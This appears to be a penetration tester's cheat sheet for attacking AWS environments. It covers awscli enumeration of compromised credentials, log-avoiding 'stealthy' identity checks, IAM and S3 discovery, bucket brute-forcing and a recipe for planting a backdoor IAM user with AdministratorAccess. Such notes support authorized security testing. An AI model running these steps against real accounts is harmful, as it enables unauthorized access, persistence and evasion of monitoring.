AWS

Amazon Web Service

The ARN (Amazon Resource Name) is a unique global identifier for every AWS resource. THe IAM (Identity and Access Management) is the service that manages users and their permissions within the AWS cloud environment.

Route 53	Managed DNS service. Allows you to register domains, resolve DNS names, and route traffic (latency-based, geolocation-based, failover, etc.) to AWS resources or on-prem environments.
EC2	Compute service based on virtual machine instances. The cloud equivalent of traditional servers—choose instance type, CPU, memory, storage, networking, and OS, then deploy applications.
S3	Object storage. Suitable for files, documents, images, backups, archives, and datasets. Highly scalable and durable; widely used as a data lake or backend storage for applications and content distribution.
RDS	Managed relational database service. Supports engines like MySQL, PostgreSQL, SQL Server, Oracle, and Aurora; handles provisioning, patching, backups, scaling, and high availability (Multi-AZ, read replicas)

Configuration

We can interact with AWS with awscli (DOC).

sudo apt install awscli

Let's start awscli and configure it with a profile IAM, a user of your own AWS account.

aws configure --profile <NAME>
# Access Key & Secret Key
# ~/.aws/credentials
# ~/.aws/config

Enumeration Credentials

aws --profile <NAME> sts get-caller-identity

More stealthy than get-caller-identity

In case of compromised credentials, more stealthy enumeration whose event should not be logged by default.

aws --profile <NAME> sts get-access-key-info --access-key-id <ACCESS_KEY> # ID ACCOUNT
aws --profile <NAME> lambda invoke --function-name arn:aws:lambda:us-east-1:123456789012:function:nonexistent-function outfile # In Error: ACCOUNT ID, type of identity (IAM user or role), name of the identity

We can also try with different region --region (logs event are recorded in the region used and may not be notice).

aws --profile <NAME> iam get-account-summary

# With GetAccountAuthorizationDetails permission
aws --profile <NAME> iam get-account-authorization-details --filter User Group LocalManagedPolicy Role

Query JMESPath

aws --profile <NAME> <COMMAND> --query <QUERY>

aws <AWS_COMMAND> --query "UserDetailList[].UserName"
aws <AWS_COMMAND> --query "UserDetailList[0].[UserName,Path,GroupList]"
aws <AWS_COMMAND> --query "UserDetailList[0].{<ID1>: UserName,<ID2>: Path,<ID3>: GroupList}"
aws <AWS_COMMAND> --query "UserDetailList[?contains(UserName,'admin') && Path=='/admin/'].UserName"
aws <AWS_COMMAND> --query  "{Users: UserDetailList[?Path=='/admin/'].UserName, Groups: GroupDetailList[?Path=='/admin/'].{Name: GroupName}}"

We should always try to reduce the number of requests we send by saving all output to a local file and then using an external tool like jp to filter that output with JMESPath expressions.

Policy

List inline policies and managed policies.

aws --profile <NAME> iam list-user-policies --user-name <USER>
aws --profile <NAME> iam list-attached-user-policies --user-name <USER>

Group

aws --profile <NAME> iam list-groups-for-user --user-name <USER> # Users in a Groups
aws --profile <NAME> iam get-group --group-name <GROUP> # Groups of a user

aws --profile <NAME> iam list-group-policies --group-name <GROUP>
aws --profile <NAME> iam list-attached-group-policies --group-name <GROUP>

Role

aws --profile <NAME> iam list-role-policies --role-name <ROLE>
aws --profile <NAME> iam list-attached-role-policies --role-name <ROLE>

View a policy

aws --profile <NAME> iam get-policy --policy-arn <ARN_POLICY>

If the compromised credentials don't have the privileges to query for IAM-related information, we need to adopt a brute-force approach using pacu (iam__bruteforce_permissions).

Backdoor account

Create user

aws --profile <NAME> iam create-user --user-name <BACKDOOR_NAME>

Attach the AWS managed AdministratorAccess policy (or other)

aws --profile <NAME> iam attach-user-policy  --user-name <BACKDOOR_USER> --policy-arn arn:aws:iam::aws:policy/AdministratorAccess

Create the access key and secret key for the user

aws --profile CompromisedJenkins iam create-access-key --user-name backdoor

Automated Enumeration

With pacu.

pacu
> <SESSION_NAME>
> import_keys <NAME> # Load User
> run iam__enum_users_roles_policies_groups # Get Data
> services # Show Services
> data [<SERVICE>] # Show Data

S3

Cloud-based object storage service. Allows objects to be stored in containers called buckets.

Enumeration

Search for resources (ex. in website requests):

https://s3.amazonaws.com/<BUCKET>/<KEY> # autoredirects to the region code
https://s3.<REGION-CODE>.amazonaws.com/<BUCKET>/<KEY>
https://<BUCKET>.s3.amazonaws.com/<KEY> # autoredirects to the region code
https://<BUCKET>.s3.<REGION-CODE>.amazonaws.com/<KEY>

To find the S3 bucket region, we can check the HTTP response (X-Amz-Bucket-Region) or with /?location on the bucket.

We can use cloudbrute or cloud-enum

cloud_enum -k <BUCKET> --quickscan --disable-azure --disable-gcp

for key in "public" "private" "dev" "prod" "development" "production"; do echo "<START_BUCKET>-$key-<END_BUCKET>"; done | tee /tmp/keyfile.txt
cloud_enum -kf /tmp/keyfile.txt -qs --disable-azure --disable-gcp

Note:

1. S3 buckets are commonly misconfigured so that the bucket ACL blocks public access, but allows access to any AWS authenticated user, even if they're in a different AWS account

2. If we have a private bucket without permission to listing its contents ("Access Denied"), it is still possible that the files inside it are accessible. We can therefore try a brute force attack on the files.

Interaction

It is possible to use arbitrary values for all fields in IAM Configuration because sometimes the target server is configured not to check authentication.

We list all S3 buckets hosted by the server.

aws --profile <NAME> s3 ls
aws --profile <NAME> s3 ls [--endpoint=http://s3.<DOMAIN>] # For Custom Implementations

We list the common objects and prefixes in the specified bucket.

aws --profile <NAME> s3 ls <BUCKET>[/<PATH>]

We can download objects from the buckets.

aws --profile <NAME> s3 cp s3://<BUCKET>[/<PATH>]/<FILE> ./<FILE> [--recursive]
aws --profile <NAME> s3 sync s3://<BUCKET>[/<PATH>]/ ./<DIR>

We can upload object into the buckets.

aws --profile <NAME> s3 cp ./<FILE> s3://<BUCKET>[/<PATH>]/<FILE>

Account IDs from S3 Buckets

Details

in your AWS account create ROLE with Custom Trust Policy

1. In your AWS account create ROLE with Custom Trust Policy

SearchID

{
	"Version": "2012-10-17",
	"Statement": [
		{
			"Effect": "Allow",
			"Principal": {
			    "AWS": "arn:aws:iam::<AWS_ACCOUND_ID>:user/<USER>"
			},
			"Action": "sts:AssumeRole"
		}
	]
}

2. Add the following Authorization to the ROLE

SearchPermission

{
	"Version": "2012-10-17",
	"Statement": [
		{
			"Sid": "EnumGetObject",
			"Effect": "Allow",
			"Action": "s3:GetObject",
			"Resource": "*"
		},
		{
			"Sid": "EnumListBucket",
			"Effect": "Allow",
			"Action": "s3:ListBucket",
			"Resource": "*"
		}
	]
}

3. Add the following authorization policy to your IAM user

SearchPermission

{
	"Version": "2012-10-17",
	"Statement": [
		{
			"Effect": "Allow",
			"Action": "sts:AssumeRole",
			"Resource": "arn:aws:iam::<AWS_ACCOUND_ID>:role/SearchID"
		}
	]
}

Now we can run s3-account-search

s3-account-search --profile <USER> arn:aws:iam::<AWS_ACCOUND_ID>:role/SearchID <BUCKET>

Users & Role from Account IDs

Similar to the "Account IDs from S3 Buckets" approach.

Add the “AdministratorAccess” managed policy to your IAM user and use pacu.

> run iam__enum_roles --word-list <WORDLIST_ROLE> --account-id <TARGET_ACCOUNT_ID>
> help iam__enum_users

EC2

AMI

Publicly shared Amazon Machine Images (AMIs) AMIs are virtual machine images containing a pre-installed operating system along with software and files.

aws --profile <NAME> ec2 describe-images --owners amazon --executable-users all

aws --profile <NAME> ec2 describe-images --owners <USER_ID> --executable-users all --filters "Name=<PARAM>,Values=<VALUE1>,<VALUE2>,..."
aws --profile <NAME> ec2 describe-images --owners <USER_ID> --executable-users all --filters "Name=[description/name],Values=*value*"

EBS

Publicly shared Elastic Block Storage (EBS) snapshots

aws --profile <NAME> ec2 describe-snapshots --owner-ids <USER_ID> --filters "Name=<PARAM>,Values=<VALUE1>,<VALUE2>,..."